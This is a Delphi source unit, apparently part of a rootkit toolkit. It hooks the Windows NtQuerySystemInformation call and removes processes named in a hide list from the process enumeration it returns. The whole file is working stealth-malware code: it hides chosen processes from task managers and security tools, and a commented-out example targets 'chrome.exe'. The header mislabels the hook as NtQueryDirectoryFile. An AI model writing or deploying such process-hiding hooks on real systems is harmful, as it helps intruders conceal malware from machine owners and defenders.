(*
 - NtQueryDirectoryFile Hook
 - Moriarty
 - Checks if a hidden file is in the process list. if so, remove from list.
 - [Process Hide]
*)

 unit uNtQuerySystemInformation;
(*
 - NtQueryDirectoryFile Hook
 - Moriarty
 - Checks if a hidden file is in the process list. if so, remove from list.
 - [Process Hide]
*)

interface
uses Windows, uNTConstants, LOMLib;


type
  PProcessInfo = ^TProcessInfo;
  TProcessInfo = record
    dwOffset: dword; // an offset to the next Process structure
    dwThreadCount: dword;
    dwUnkown1: array[0..5] of dword;
    ftCreationTime: TFileTime;
    dwUnkown2: dword;
    dwUnkown3: dword;
    dwUnkown4: dword;
    dwUnkown5: dword;
    dwUnkown6: dword;
    pszProcessName: PWideChar;
    dwBasePriority: dword;
    dwProcessID: dword;
    dwParentProcessID: dword;
    dwHandleCount: dword;
    dwUnkown7: dword;
    dwUnkown8: dword;
    dwVirtualBytesPeak: dword;
    dwVirtualBytes: dword;
    dwPageFaults: dword;
    dwWorkingSetPeak: dword;
    dwWorkingSet: dword;
    dwUnkown9: dword;
    dwPagedPool: dword; // kbytes
    dwUnkown10: dword;
    dwNonPagedPool: dword; // kbytes
    dwPageFileBytesPeak: dword;
    dwPageFileBytes: dword;
    dwPrivateBytes: dword;
    dwUnkown11: dword;
    dwUnkown12: dword;
    dwUnkown13: dword;
    dwUnkown14: dword;
    ThreadInfo: dword; // Thread list
  end;

var
  MainNtQuerySystemInformation: function(dt: dword; buf: pointer; bufsize: dword; retlen: pointer): dword; stdcall;
  szProcessHide : TStrList;
function HookNtQuerySystemInformation(dt: dword; buf: pointer; bufsize: dword; retlen: pointer): dword; stdcall;

implementation

{const
  hide_process = 'chrome.exe';}

  (******************************************************************************************************************************************)

function HookNtQuerySystemInformation(dt: dword; buf: pointer; bufsize: dword; retlen: pointer): dword; stdcall;
type
  TBA = array[0..1000000] of byte;
  PBA = ^TBA;
var
  tmpbuf: PBA;
  Pinfo, LastPinfo: PProcessInfo;
  cp: DWORD;
  curproc: string;
  i: integer;
  bHideProcess: Boolean;
begin
  Result := MainNtQuerySystemInformation(dt, buf, bufsize, retlen);
  if dt <> 5 then exit;
  if result <> 0 then exit;
  cp := 0;
  tmpbuf := buf; LastPinfo := nil;
  repeat
    Pinfo := PProcessInfo(@tmpbuf[cp]);
    curproc := WideCharToString(pinfo^.pszProcessName);
    bHideProcess := false;
    for i := 0 to szProcessHide.Count - 1 do
    begin
      if curproc = szProcessHide.Strings[i] then
      begin
        bHideProcess := true; Break;
      end;
    end;

    //if Pos(hide_process, curproc) > 0 then bHideProcess := true;

    if bHideProcess = true then
    begin
      if pinfo^.dwOffset = 0 then
      begin
        LastPinfo^.dwOffset := 0; exit;
      end
      else
        LastPinfo^.dwOffset := LastPinfo^.dwOffset + pinfo.dwOffset;
    end else
    begin
      LastPinfo := Pinfo;
    end;
    cp := cp + Pinfo^.dwOffset;
  until Pinfo^.dwOffset = 0;

end;

(******************************************************************************************************************************************)

end.[/i]